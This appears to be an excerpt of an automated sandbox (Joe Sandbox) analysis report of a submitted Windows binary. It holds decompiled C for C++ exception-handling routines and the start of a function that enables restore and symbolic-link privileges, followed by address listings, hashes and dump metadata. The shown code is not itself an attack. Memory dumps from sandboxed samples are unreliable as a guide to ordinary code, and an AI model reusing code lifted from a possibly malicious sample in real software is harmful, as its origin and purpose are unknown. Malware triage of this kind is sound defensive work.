				_t275 = E00CE3DAA(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E00CE8D24(_t270, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if(__eflags == 0) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00CE2AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
						__eflags =  *(_t202 + 8);
						if(__eflags != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00CE2AEC(_t271, _t275, _t296, 0, _t315, __eflags);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00CE0961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00CE0894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00CE2DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E00CE8D24(_t271, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						_t342 = _t270[0x1c];
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00CE2AEC(_t270, _t275, _t296, _t301, 0, _t342);
							_t343 =  *((intOrPtr*)(_t224 + 0x10));
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00CE2AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
								_t259 = E00CE2AEC(_t270, _t275, _t296, _t301, 0, _t343);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0) {
									goto L67;
								} else {
									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
										L16:
										_t261 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, _t350);
										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
											L23:
											_t296 = _v8;
											_t275 = _v12;
											L24:
											_v52 = _t301;
											_v48 = 0;
											__eflags =  *_t270 - 0xe06d7363;
											if( *_t270 != 0xe06d7363) {
												L57:
												__eflags = _t301[3];
												if(__eflags <= 0) {
													goto L60;
												} else {
													__eflags = _a24;
													if(__eflags != 0) {
														goto L67;
													} else {
														_push(_a32);
														_push(_a28);
														_push(_t275);
														_push(_t301);
														_push(_a16);
														_push(_t296);
														_push(_a8);
														_push(_t270);
														L68();
														_t332 = _t332 + 0x20;
														goto L60;
													}
												}
											} else {
												__eflags = _t270[0x10] - 3;
												if(_t270[0x10] != 3) {
													goto L57;
												} else {
													__eflags = _t270[0x14] - 0x19930520;
													if(_t270[0x14] == 0x19930520) {
														L29:
														_t315 = _a32;
														__eflags = _t301[3];
														if(_t301[3] > 0) {
															_push(_a28);
															E00CE0894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
															_t296 = _v64;
															_t332 = _t332 + 0x18;
															_t247 = _v68;
															_v44 = _t247;
															_v16 = _t296;
															__eflags = _t296 - _v56;
															if(_t296 < _v56) {
																_t290 = _t296 * 0x14;
																__eflags = _t290;
																_v32 = _t290;
																do {
																	_t291 = 5;
																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																	_t332 = _t332 + 0xc;
																	__eflags = _v104 - _t250;
																	if(_v104 <= _t250) {
																		__eflags = _t250 - _v100;
																		if(_t250 <= _v100) {
																			_t294 = 0;
																			_v20 = 0;
																			__eflags = _v92;
																			if(_v92 != 0) {
																				_t299 = _t270[0x1c];
																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
																				_t252 = _t251 + 4;
																				__eflags = _t252;
																				_v36 = _t252;
																				_t253 = _v88;
																				_v40 =  *_t251;
																				_v24 = _t253;
																				do {
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					_t327 = _v40;
																					_t314 = _v36;
																					__eflags = _t327;
																					if(_t327 <= 0) {
																						goto L40;
																					} else {
																						while(1) {
																							_push(_t299);
																							_push( *_t314);
																							_t254 =  &_v84;
																							_push(_t254);
																							L87();
																							_t332 = _t332 + 0xc;
																							__eflags = _t254;
																							if(_t254 != 0) {
																								break;
																							}
																							_t299 = _t270[0x1c];
																							_t327 = _t327 - 1;
																							_t314 = _t314 + 4;
																							__eflags = _t327;
																							if(_t327 > 0) {
																								continue;
																							} else {
																								_t294 = _v20;
																								_t253 = _v24;
																								goto L40;
																							}
																							goto L43;
																						}
																						_push(_a24);
																						_push(_v28);
																						E00CE2DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																						_t332 = _t332 + 0x30;
																					}
																					L43:
																					_t296 = _v16;
																					goto L44;
																					L40:
																					_t294 = _t294 + 1;
																					_t253 = _t253 + 0x10;
																					_v20 = _t294;
																					_v24 = _t253;
																					__eflags = _t294 - _v92;
																				} while (_t294 != _v92);
																				goto L43;
																			}
																		}
																	}
																	L44:
																	_t296 = _t296 + 1;
																	_t247 = _v44;
																	_t290 = _v32 + 0x14;
																	_v16 = _t296;
																	_v32 = _t290;
																	__eflags = _t296 - _v56;
																} while (_t296 < _v56);
																_t301 = _a20;
																_t315 = _a32;
															}
														}
														__eflags = _a24;
														if(__eflags != 0) {
															_push(1);
															E00CE0150(_t270, _t301, _t315, __eflags);
															_t275 = _t270;
														}
														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
														if(__eflags < 0) {
															L60:
															_t224 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
															__eflags =  *(_t224 + 0x1c);
															if( *(_t224 + 0x1c) != 0) {
																goto L67;
															} else {
																goto L61;
															}
														} else {
															_t228 = _t301[8] >> 2;
															__eflags = _t301[7];
															if(_t301[7] != 0) {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	_push(_t301[7]);
																	_t229 = E00CE384A(_t270, _t301, _t315, _t270);
																	_pop(_t275);
																	__eflags = _t229;
																	if(__eflags == 0) {
																		goto L64;
																	} else {
																		goto L60;
																	}
																} else {
																	goto L54;
																}
															} else {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	goto L60;
																} else {
																	__eflags = _a28;
																	if(__eflags != 0) {
																		goto L60;
																	} else {
																		L54:
																		 *(E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
																		_t237 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
																		_t286 = _v8;
																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																		goto L62;
																	}
																}
															}
														}
													} else {
														__eflags = _t270[0x14] - 0x19930521;
														if(_t270[0x14] == 0x19930521) {
															goto L29;
														} else {
															__eflags = _t270[0x14] - 0x19930522;
															if(_t270[0x14] != 0x19930522) {
																goto L57;
															} else {
																goto L29;
															}
														}
													}
												}
											}
										} else {
											_v16 =  *((intOrPtr*)(E00CE2AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
											_t264 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, _t351);
											_push(_v16);
											 *(_t264 + 0x1c) = _t315;
											_t265 = E00CE384A(_t270, _t301, _t315, _t270);
											_pop(_t286);
											if(_t265 != 0) {
												goto L23;
											} else {
												_t301 = _v16;
												_t353 =  *_t301 - _t315;
												if( *_t301 <= _t315) {
													L62:
													E00CE7AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
												} else {
													while(1) {
														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
														if(E00CE34D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xcfefb4) != 0) {
															goto L63;
														}
														_t315 = _t315 + 0x10;
														_t269 = _v20 + 1;
														_v20 = _t269;
														_t353 = _t269 -  *_t301;
														if(_t269 >=  *_t301) {
															goto L62;
														} else {
															continue;
														}
														goto L63;
													}
												}
												L63:
												_push(1);
												_push(_t270);
												E00CE0150(_t270, _t301, _t315, __eflags);
												_t275 =  &_v64;
												E00CE34BB( &_v64);
												E00CE238D( &_v64, 0xcfc284);
												L64:
												 *(E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
												_t231 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
												_t275 = _v8;
												 *(_t231 + 0x14) = _v8;
												__eflags = _t315;
												if(_t315 == 0) {
													_t315 = _a8;
												}
												E00CE0A87(_t275, _t315, _t270);
												E00CE374A(_a8, _a16, _t301);
												_t234 = E00CE3907(_t301);
												_t332 = _t332 + 0x10;
												_push(_t234);
												E00CE36C1(_t270, _t275, _t296, _t301, _t315, __eflags);
												goto L67;
											}
										}
									} else {
										_t350 = _t270[0x1c] - _t315;
										if(_t270[0x1c] == _t315) {
											goto L67;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}























































































                                                    0x00ce2e31
                                                    0x00ce2e38
                                                    0x00ce2e3a
                                                    0x00ce2e43
                                                    0x00ce2e49
                                                    0x00ce2e51
                                                    0x00ce2e53
                                                    0x00ce2e56
                                                    0x00ce2e5c
                                                    0x00ce31d0
                                                    0x00ce31d0
                                                    0x00ce31d5
                                                    0x00ce31d7
                                                    0x00ce31d9
                                                    0x00ce31dc
                                                    0x00ce31dd
                                                    0x00ce31e0
                                                    0x00ce31e6
                                                    0x00ce3305
                                                    0x00ce31ec
                                                    0x00ce31ec
                                                    0x00ce31ed
                                                    0x00ce31ee
                                                    0x00ce31f5
                                                    0x00ce31f8
                                                    0x00ce31fb
                                                    0x00ce3201
                                                    0x00ce3203
                                                    0x00ce3208
                                                    0x00ce320b
                                                    0x00ce320d
                                                    0x00ce3213
                                                    0x00ce3215
                                                    0x00ce321b
                                                    0x00ce3230
                                                    0x00ce3235
                                                    0x00ce3238
                                                    0x00ce323a
                                                    0x00ce3301
                                                    0x00000000
                                                    0x00ce3302
                                                    0x00ce323a
                                                    0x00ce321b
                                                    0x00ce3213
                                                    0x00ce320b
                                                    0x00ce3240
                                                    0x00ce3243
                                                    0x00ce3246
                                                    0x00ce3249
                                                    0x00ce324c
                                                    0x00ce3252
                                                    0x00ce3264
                                                    0x00ce3269
                                                    0x00ce326c
                                                    0x00ce326f
                                                    0x00ce3272
                                                    0x00ce3275
                                                    0x00ce3278
                                                    0x00ce327b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3281
                                                    0x00ce3281
                                                    0x00ce3284
                                                    0x00ce3287
                                                    0x00ce3296
                                                    0x00ce3297
                                                    0x00ce3297
                                                    0x00ce3299
                                                    0x00ce329c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce329e
                                                    0x00ce32a1
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce32af
                                                    0x00ce32b1
                                                    0x00ce32b4
                                                    0x00ce32b6
                                                    0x00ce32be
                                                    0x00ce32be
                                                    0x00ce32c1
                                                    0x00ce32c3
                                                    0x00ce32c5
                                                    0x00ce32e1
                                                    0x00ce32e6
                                                    0x00ce32e9
                                                    0x00ce32e9
                                                    0x00000000
                                                    0x00ce32c1
                                                    0x00ce32b8
                                                    0x00ce32bc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce32ec
                                                    0x00ce32ef
                                                    0x00ce32f0
                                                    0x00ce32f3
                                                    0x00ce32f6
                                                    0x00ce32f9
                                                    0x00ce32fc
                                                    0x00ce32fc
                                                    0x00000000
                                                    0x00ce3287
                                                    0x00ce3306
                                                    0x00ce330b
                                                    0x00ce330c
                                                    0x00ce330f
                                                    0x00ce3312
                                                    0x00ce3313
                                                    0x00ce3314
                                                    0x00ce3315
                                                    0x00ce3318
                                                    0x00ce331a
                                                    0x00ce3392
                                                    0x00ce3394
                                                    0x00ce3394
                                                    0x00ce331c
                                                    0x00ce331c
                                                    0x00ce331f
                                                    0x00ce3322
                                                    0x00000000
                                                    0x00ce3324
                                                    0x00ce3324
                                                    0x00ce3327
                                                    0x00ce332a
                                                    0x00ce3331
                                                    0x00ce3331
                                                    0x00ce3334
                                                    0x00ce3336
                                                    0x00ce3338
                                                    0x00ce336a
                                                    0x00ce336a
                                                    0x00ce336d
                                                    0x00ce3374
                                                    0x00ce3374
                                                    0x00ce3377
                                                    0x00ce337a
                                                    0x00ce3381
                                                    0x00ce3381
                                                    0x00ce3384
                                                    0x00ce338b
                                                    0x00ce338d
                                                    0x00ce338d
                                                    0x00ce3386
                                                    0x00ce3386
                                                    0x00ce3389
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3389
                                                    0x00ce337c
                                                    0x00ce337c
                                                    0x00ce337f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce337f
                                                    0x00ce336f
                                                    0x00ce336f
                                                    0x00ce3372
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3372
                                                    0x00ce338e
                                                    0x00ce333a
                                                    0x00ce333a
                                                    0x00ce333a
                                                    0x00ce333d
                                                    0x00ce333d
                                                    0x00ce333f
                                                    0x00ce3341
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3343
                                                    0x00ce3345
                                                    0x00ce3359
                                                    0x00ce3359
                                                    0x00ce3347
                                                    0x00ce3347
                                                    0x00ce334a
                                                    0x00ce334d
                                                    0x00000000
                                                    0x00ce334f
                                                    0x00ce334f
                                                    0x00ce3352
                                                    0x00ce3355
                                                    0x00ce3357
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3357
                                                    0x00ce334d
                                                    0x00ce3362
                                                    0x00ce3362
                                                    0x00ce3364
                                                    0x00000000
                                                    0x00ce3366
                                                    0x00ce3366
                                                    0x00ce3366
                                                    0x00000000
                                                    0x00ce3364
                                                    0x00ce335d
                                                    0x00ce335f
                                                    0x00ce335f
                                                    0x00000000
                                                    0x00ce335f
                                                    0x00ce332c
                                                    0x00ce332c
                                                    0x00ce332f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce332f
                                                    0x00ce332a
                                                    0x00ce3322
                                                    0x00ce3395
                                                    0x00ce3399
                                                    0x00ce3399
                                                    0x00ce2e6b
                                                    0x00ce2e6b
                                                    0x00ce2e74
                                                    0x00ce2f71
                                                    0x00ce2f71
                                                    0x00ce2f74
                                                    0x00000000
                                                    0x00ce2ea3
                                                    0x00ce2ea3
                                                    0x00ce2ea5
                                                    0x00ce2ea8
                                                    0x00000000
                                                    0x00ce2eae
                                                    0x00ce2eae
                                                    0x00ce2eb3
                                                    0x00ce2eb6
                                                    0x00ce316a
                                                    0x00ce316e
                                                    0x00ce2ebc
                                                    0x00ce2ec1
                                                    0x00ce2ec4
                                                    0x00ce2ec9
                                                    0x00ce2ed0
                                                    0x00ce2ed5
                                                    0x00000000
                                                    0x00ce2edb
                                                    0x00ce2ee1
                                                    0x00ce2f0d
                                                    0x00ce2f0d
                                                    0x00ce2f12
                                                    0x00ce2f15
                                                    0x00ce2f79
                                                    0x00ce2f79
                                                    0x00ce2f7c
                                                    0x00ce2f7f
                                                    0x00ce2f81
                                                    0x00ce2f84
                                                    0x00ce2f87
                                                    0x00ce2f8d
                                                    0x00ce3139
                                                    0x00ce3139
                                                    0x00ce313c
                                                    0x00000000
                                                    0x00ce313e
                                                    0x00ce313e
                                                    0x00ce3141
                                                    0x00000000
                                                    0x00ce3147
                                                    0x00ce3147
                                                    0x00ce314a
                                                    0x00ce314d
                                                    0x00ce314e
                                                    0x00ce314f
                                                    0x00ce3152
                                                    0x00ce3153
                                                    0x00ce3156
                                                    0x00ce3157
                                                    0x00ce315c
                                                    0x00000000
                                                    0x00ce315c
                                                    0x00ce3141
                                                    0x00ce2f93
                                                    0x00ce2f93
                                                    0x00ce2f97
                                                    0x00000000
                                                    0x00ce2f9d
                                                    0x00ce2f9d
                                                    0x00ce2fa4
                                                    0x00ce2fbc
                                                    0x00ce2fbc
                                                    0x00ce2fbf
                                                    0x00ce2fc2
                                                    0x00ce2fc8
                                                    0x00ce2fd8
                                                    0x00ce2fdd
                                                    0x00ce2fe0
                                                    0x00ce2fe3
                                                    0x00ce2fe6
                                                    0x00ce2fe9
                                                    0x00ce2fec
                                                    0x00ce2fef
                                                    0x00ce2ff5
                                                    0x00ce2ff5
                                                    0x00ce2ff8
                                                    0x00ce2ffb
                                                    0x00ce300a
                                                    0x00ce300b
                                                    0x00ce300b
                                                    0x00ce300d
                                                    0x00ce3010
                                                    0x00ce3016
                                                    0x00ce3019
                                                    0x00ce301f
                                                    0x00ce3021
                                                    0x00ce3024
                                                    0x00ce3027
                                                    0x00ce302d
                                                    0x00ce3030
                                                    0x00ce3035
                                                    0x00ce3035
                                                    0x00ce3038
                                                    0x00ce303b
                                                    0x00ce303e
                                                    0x00ce3041
                                                    0x00ce3044
                                                    0x00ce3049
                                                    0x00ce304a
                                                    0x00ce304b
                                                    0x00ce304c
                                                    0x00ce304d
                                                    0x00ce3050
                                                    0x00ce3053
                                                    0x00ce3055
                                                    0x00000000
                                                    0x00ce3057
                                                    0x00ce3057
                                                    0x00ce3057
                                                    0x00ce3058
                                                    0x00ce305a
                                                    0x00ce305d
                                                    0x00ce305e
                                                    0x00ce3063
                                                    0x00ce3066
                                                    0x00ce3068
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce306a
                                                    0x00ce306d
                                                    0x00ce306e
                                                    0x00ce3071
                                                    0x00ce3073
                                                    0x00000000
                                                    0x00ce3075
                                                    0x00ce3075
                                                    0x00ce3078
                                                    0x00000000
                                                    0x00ce3078
                                                    0x00000000
                                                    0x00ce3073
                                                    0x00ce308c
                                                    0x00ce3092
                                                    0x00ce30af
                                                    0x00ce30b4
                                                    0x00ce30b4
                                                    0x00ce30b7
                                                    0x00ce30b7
                                                    0x00000000
                                                    0x00ce307b
                                                    0x00ce307b
                                                    0x00ce307c
                                                    0x00ce307f
                                                    0x00ce3082
                                                    0x00ce3085
                                                    0x00ce3085
                                                    0x00000000
                                                    0x00ce308a
                                                    0x00ce3027
                                                    0x00ce3019
                                                    0x00ce30ba
                                                    0x00ce30bd
                                                    0x00ce30be
                                                    0x00ce30c1
                                                    0x00ce30c4
                                                    0x00ce30c7
                                                    0x00ce30ca
                                                    0x00ce30ca
                                                    0x00ce30d3
                                                    0x00ce30d6
                                                    0x00ce30d6
                                                    0x00ce2fef
                                                    0x00ce30d9
                                                    0x00ce30dd
                                                    0x00ce30df
                                                    0x00ce30e2
                                                    0x00ce30e8
                                                    0x00ce30e8
                                                    0x00ce30f0
                                                    0x00ce30f5
                                                    0x00ce315f
                                                    0x00ce315f
                                                    0x00ce3164
                                                    0x00ce3168
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce30f7
                                                    0x00ce30fa
                                                    0x00ce30fd
                                                    0x00ce3101
                                                    0x00ce310f
                                                    0x00ce3111
                                                    0x00ce3128
                                                    0x00ce312c
                                                    0x00ce3132
                                                    0x00ce3133
                                                    0x00ce3135
                                                    0x00000000
                                                    0x00ce3137
                                                    0x00000000
                                                    0x00ce3137
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3103
                                                    0x00ce3103
                                                    0x00ce3105
                                                    0x00000000
                                                    0x00ce3107
                                                    0x00ce3107
                                                    0x00ce310b
                                                    0x00000000
                                                    0x00ce310d
                                                    0x00ce3113
                                                    0x00ce3118
                                                    0x00ce311b
                                                    0x00ce3120
                                                    0x00ce3123
                                                    0x00000000
                                                    0x00ce3123
                                                    0x00ce310b
                                                    0x00ce3105
                                                    0x00ce3101
                                                    0x00ce2fa6
                                                    0x00ce2fa6
                                                    0x00ce2fad
                                                    0x00000000
                                                    0x00ce2faf
                                                    0x00ce2faf
                                                    0x00ce2fb6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2fb6
                                                    0x00ce2fad
                                                    0x00ce2fa4
                                                    0x00ce2f97
                                                    0x00ce2f17
                                                    0x00ce2f1f
                                                    0x00ce2f22
                                                    0x00ce2f27
                                                    0x00ce2f2b
                                                    0x00ce2f2e
                                                    0x00ce2f34
                                                    0x00ce2f37
                                                    0x00000000
                                                    0x00ce2f39
                                                    0x00ce2f39
                                                    0x00ce2f3c
                                                    0x00ce2f3e
                                                    0x00ce316f
                                                    0x00ce316f
                                                    0x00000000
                                                    0x00ce2f44
                                                    0x00ce2f4c
                                                    0x00ce2f57
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2f60
                                                    0x00ce2f63
                                                    0x00ce2f64
                                                    0x00ce2f67
                                                    0x00ce2f69
                                                    0x00000000
                                                    0x00ce2f6f
                                                    0x00000000
                                                    0x00ce2f6f
                                                    0x00000000
                                                    0x00ce2f69
                                                    0x00ce2f44
                                                    0x00ce3174
                                                    0x00ce3174
                                                    0x00ce3176
                                                    0x00ce3177
                                                    0x00ce317e
                                                    0x00ce3181
                                                    0x00ce318f
                                                    0x00ce3194
                                                    0x00ce3199
                                                    0x00ce319c
                                                    0x00ce31a1
                                                    0x00ce31a4
                                                    0x00ce31a7
                                                    0x00ce31a9
                                                    0x00ce31ab
                                                    0x00ce31ab
                                                    0x00ce31b0
                                                    0x00ce31bc
                                                    0x00ce31c2
                                                    0x00ce31c7
                                                    0x00ce31ca
                                                    0x00ce31cb
                                                    0x00000000
                                                    0x00ce31cb
                                                    0x00ce2f37
                                                    0x00ce2f04
                                                    0x00ce2f04
                                                    0x00ce2f07
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2f07
                                                    0x00ce2ee1
                                                    0x00ce2ed5
                                                    0x00ce2eb6
                                                    0x00ce2ea8
                                                    0x00ce2e74

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 322700389-393685449
                                                    • Opcode ID: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                    • Instruction ID: 8b221ff6eccb783a14d4ccef9b9fb231c4923c2f7c63c414753f11cb3a37fafc
                                                    • Opcode Fuzzy Hash: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                    • Instruction Fuzzy Hash: 80B18D719002D9EFCF25DFA6C8859AEB7B9FF04310F14416AE8116B212D731EB51DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CC6FA5(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00CDEB78(0xcf279e, _t253);
				E00CDEC50(0x30a8);
				if( *0xd01023 == 0) {
					E00CC7A9C(L"SeRestorePrivilege");
					E00CC7A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xd01023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00CC13BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00CD0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00CE3E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00CE6088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
